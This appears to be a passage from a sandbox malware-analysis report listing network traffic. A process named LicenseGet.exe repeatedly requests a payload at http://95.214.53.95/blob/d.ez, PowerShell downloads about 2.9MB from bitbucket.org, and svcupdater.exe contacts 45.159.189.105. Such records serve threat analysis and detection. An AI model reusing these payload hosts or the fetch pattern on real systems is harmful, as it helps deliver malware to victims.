                                                                                                                                  X-CSRF-TOKEN: QYa+AK31Byd0clVj1wwrNApQGpDiagHn7m1l7cot7RkBc+iLftm1AvHgWJQXEQ4qHMDXkX4yLSU9OsH+Ki4EzA==
                                                                                                                                  Cookie: CSRF-TOKEN=QYa+AK31Byd0clVj1wwrNApQGpDiagHn7m1l7cot7RkBc+iLftm1AvHgWJQXEQ4qHMDXkX4yLSU9OsH+Ki4EzA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:42 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: HvDptU2vIdwlkum+X+nMSGz3iBPo/D2RsPEQeVZeQy+BvwQviE2rh9Kth++T74cnb67tf4ldFfxaAgTdFRcubA==
                                                                                                                                  Cookie: CSRF-TOKEN=HvDptU2vIdwlkum+X+nMSGz3iBPo/D2RsPEQeVZeQy+BvwQviE2rh9Kth++T74cnb67tf4ldFfxaAgTdFRcubA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:47 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: lWXtAh1qOmUDs3JNKf8TEpzDXklB3Noskbr2DTbWZomNgOX/v47Q/E1oDBYFboU8+GJie9RT/eM+D2n1zV1iUQ==
                                                                                                                                  Cookie: CSRF-TOKEN=lWXtAh1qOmUDs3JNKf8TEpzDXklB3Noskbr2DTbWZomNgOX/v47Q/E1oDBYFboU8+GJie9RT/eM+D2n1zV1iUQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:52 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: eQ1j8R5x8EMEwmwG7FcR/5vCOP/6ZaAILDdooJGMJL0MVo8/2zW+7pqxf7BuJZcWCbgTC6eHBMhWcgknQDYwEg==
                                                                                                                                  Cookie: CSRF-TOKEN=eQ1j8R5x8EMEwmwG7FcR/5vCOP/6ZaAILDdooJGMJL0MVo8/2zW+7pqxf7BuJZcWCbgTC6eHBMhWcgknQDYwEg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:58 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: gFHeZiNa1zEEz41wI7RvifjFKGoskRwT7wA8YED07sCVhfgS5yA7vyL9OzrHwARqDTaTqH/nzZGkDUwvYyM1iQ==
                                                                                                                                  Cookie: CSRF-TOKEN=gFHeZiNa1zEEz41wI7RvifjFKGoskRwT7wA8YED07sCVhfgS5yA7vyL9OzrHwARqDTaTqH/nzZGkDUwvYyM1iQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:03 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: mKHkLUev6JlJzidx9GfbKNe4kKXZFIWxfUQ/LMC93vFaM9WNczqJkcqinVjwZZ+wlS0bHhxtG6m+MwZuBI3uqQ==
                                                                                                                                  Cookie: CSRF-TOKEN=mKHkLUev6JlJzidx9GfbKNe4kKXZFIWxfUQ/LMC93vFaM9WNczqJkcqinVjwZZ+wlS0bHhxtG6m+MwZuBI3uqQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:08 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: yvfVaU1813kWqLsA35DZwvWAcRD1xBvO0Hyc6lSvCFrD2j+gRkY3BCxzHk1P+LM327T2xx5NYM3ynCBd/ast4g==
                                                                                                                                  Cookie: CSRF-TOKEN=yvfVaU1813kWqLsA35DZwvWAcRD1xBvO0Hyc6lSvCFrD2j+gRkY3BCxzHk1P+LM327T2xx5NYM3ynCBd/ast4g==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:13 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: o9gBCaoUlN9OsrL6Xfy2uDhViikfC6yNmHhsFDtSeoVWX0qka56191F2C9XgTXUk61aQC0PWXIljjlyOPc7GDw==
                                                                                                                                  Cookie: CSRF-TOKEN=o9gBCaoUlN9OsrL6Xfy2uDhViikfC6yNmHhsFDtSeoVWX0qka56191F2C9XgTXUk61aQC0PWXIljjlyOPc7GDw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:18 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: jE4q8+5AQAIFKK/RVTmhzcQN7vEdbzMzyee+Ku2tpLE8MwAQyFrBoCoWC1WeQ5e8IdgmXIiKh/9BSl89/gOizw==
                                                                                                                                  Cookie: CSRF-TOKEN=jE4q8+5AQAIFKK/RVTmhzcQN7vEdbzMzyee+Ku2tpLE8MwAQyFrBoCoWC1WeQ5e8IdgmXIiKh/9BSl89/gOizw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:23 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: wOIXZ5XTyAs1mgli7sm0M+WHtgSHs0/hy+0ywS/sifjdJbtaw5pYVIhRrIbDUM9KEwjFQImnXbuNm+g2hqX77g==
                                                                                                                                  Cookie: CSRF-TOKEN=wOIXZ5XTyAs1mgli7sm0M+WHtgSHs0/hy+0ywS/sifjdJbtaw5pYVIhRrIbDUM9KEwjFQImnXbuNm+g2hqX77g==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:28 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: TfdLwS71IXz5d6GRD4qMq8AtttBERfwoNjoqeWZD1OEol622jpu1PO0nAgrciRgIug292d+G4zKjx3qtFp8mqw==
                                                                                                                                  Cookie: CSRF-TOKEN=TfdLwS71IXz5d6GRD4qMq8AtttBERfwoNjoqeWZD1OEol622jpu1PO0nAgrciRgIug292d+G4zKjx3qtFp8mqw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:34 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: QDcFuurCMMjhJqe3IvG2pmlJEjVOR9JXTG9xkKh/LVHEeGlVpLlZO3gU1mOj4T/+RQKzWXwBoKTuR2qyfGwMtg==
                                                                                                                                  Cookie: CSRF-TOKEN=QDcFuurCMMjhJqe3IvG2pmlJEjVOR9JXTG9xkKh/LVHEeGlVpLlZO3gU1mOj4T/+RQKzWXwBoKTuR2qyfGwMtg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:39 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 2bl4hgutn0LmLpM3yJRNUrRZp+kgCwxPmz3pUjO01dGcEfIbVGudY0M19K7GXoG0qHZRXp+Ch1mNd05ixnPv5w==
                                                                                                                                  Cookie: CSRF-TOKEN=2bl4hgutn0LmLpM3yJRNUrRZp+kgCwxPmz3pUjO01dGcEfIbVGudY0M19K7GXoG0qHZRXp+Ch1mNd05ixnPv5w==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:44 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: dErpwxKK+IceOSQuxHspSFQGFZY8JEsNwTRdKlofhZthOlnRTh+EKse0Z+fYJwej/TZPm4aIRKZ6/X5fu8DmIw==
                                                                                                                                  Cookie: CSRF-TOKEN=dErpwxKK+IceOSQuxHspSFQGFZY8JEsNwTRdKlofhZthOlnRTh+EKse0Z+fYJwej/TZPm4aIRKZ6/X5fu8DmIw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:49 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: a5TbKHRP2keddO4oa6f/T0ZGLvOXjU4GNs9ij0EQe6frp+NryvTY9t3e8K4O1PERpPnOluX7XJSRQYiutST4vg==
                                                                                                                                  Cookie: CSRF-TOKEN=a5TbKHRP2keddO4oa6f/T0ZGLvOXjU4GNs9ij0EQe6frp+NryvTY9t3e8K4O1PERpPnOluX7XJSRQYiutST4vg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:54 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 6xdak8aqu97RCAYmbLvRfX6msELfOAp3WXkeWycg8bDbglUfWnz9bKjf6k+b2Ys7ZGMp9gcvmsYCmr/gNlRe7A==
                                                                                                                                  Cookie: CSRF-TOKEN=6xdak8aqu97RCAYmbLvRfX6msELfOAp3WXkeWycg8bDbglUfWnz9bKjf6k+b2Ys7ZGMp9gcvmsYCmr/gNlRe7A==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:56:59 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: pw96kcJsbltYjVIJPT9nDSspjIyqu2JHfLeXchElZU59WewXswpewjQ/U+dlBJ2LwFwcxUM1nk4zS6f3186+rg==
                                                                                                                                  Cookie: CSRF-TOKEN=pw96kcJsbltYjVIJPT9nDSspjIyqu2JHfLeXchElZU59WewXswpewjQ/U+dlBJ2LwFwcxUM1nk4zS6f3186+rg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:57:04 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: qh7TxZpj4kXepAcKn3+We1b3FwEFgxJLfRGAdoW2pjvFmUQEpk9O4iSry4yPdn2dJ1XmYQI+3Ev2Pn8HbXudEA==
                                                                                                                                  Cookie: CSRF-TOKEN=qh7TxZpj4kXepAcKn3+We1b3FwEFgxJLfRGAdoW2pjvFmUQEpk9O4iSry4yPdn2dJ1XmYQI+3Ev2Pn8HbXudEA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:57:09 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: Opx2AfOBXpdnXnenyVjY95lCsV+9sbatgBg40l3u7YKnyC89vtF1UEl6UWA0l2tz/LtcCZjNBLFdJnz8RZEM0Q==
                                                                                                                                  Cookie: CSRF-TOKEN=Opx2AfOBXpdnXnenyVjY95lCsV+9sbatgBg40l3u7YKnyC89vtF1UEl6UWA0l2tz/LtcCZjNBLFdJnz8RZEM0Q==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:57:15 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • 185.166.142.21:443
                                                                                                                                  bitbucket.org
                                                                                                                                  tls
                                                                                                                                  powershell.exe
                                                                                                                                  61.2kB
                                                                                                                                   2.9MB
                                                                                                                                   1190
                                                                                                                                  2116
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  497 B
                                                                                                                                   481 B
                                                                                                                                   4
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  497 B
                                                                                                                                   481 B
                                                                                                                                   4
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 45.159.189.105:80
                                                                                                                                  svcupdater.exe
                                                                                                                                  260 B
                                                                                                                                   200 B
                                                                                                                                   5
                                                                                                                                  5
                                                                                                                                • 45.159.189.105:80
                                                                                                                                  svcupdater.exe
                                                                                                                                  260 B
                                                                                                                                   200 B
                                                                                                                                   5
                                                                                                                                  5
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
                                                                                                                                  543 B
                                                                                                                                   481 B
                                                                                                                                   5
                                                                                                                                  5

                                                                                                                                  HTTP Request

                                                                                                                                  GET http://95.214.53.95/blob/d.ez

                                                                                                                                  HTTP Response

                                                                                                                                  404
                                                                                                                                • 95.214.53.95:80
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  http
                                                                                                                                  LicenseGet.exe
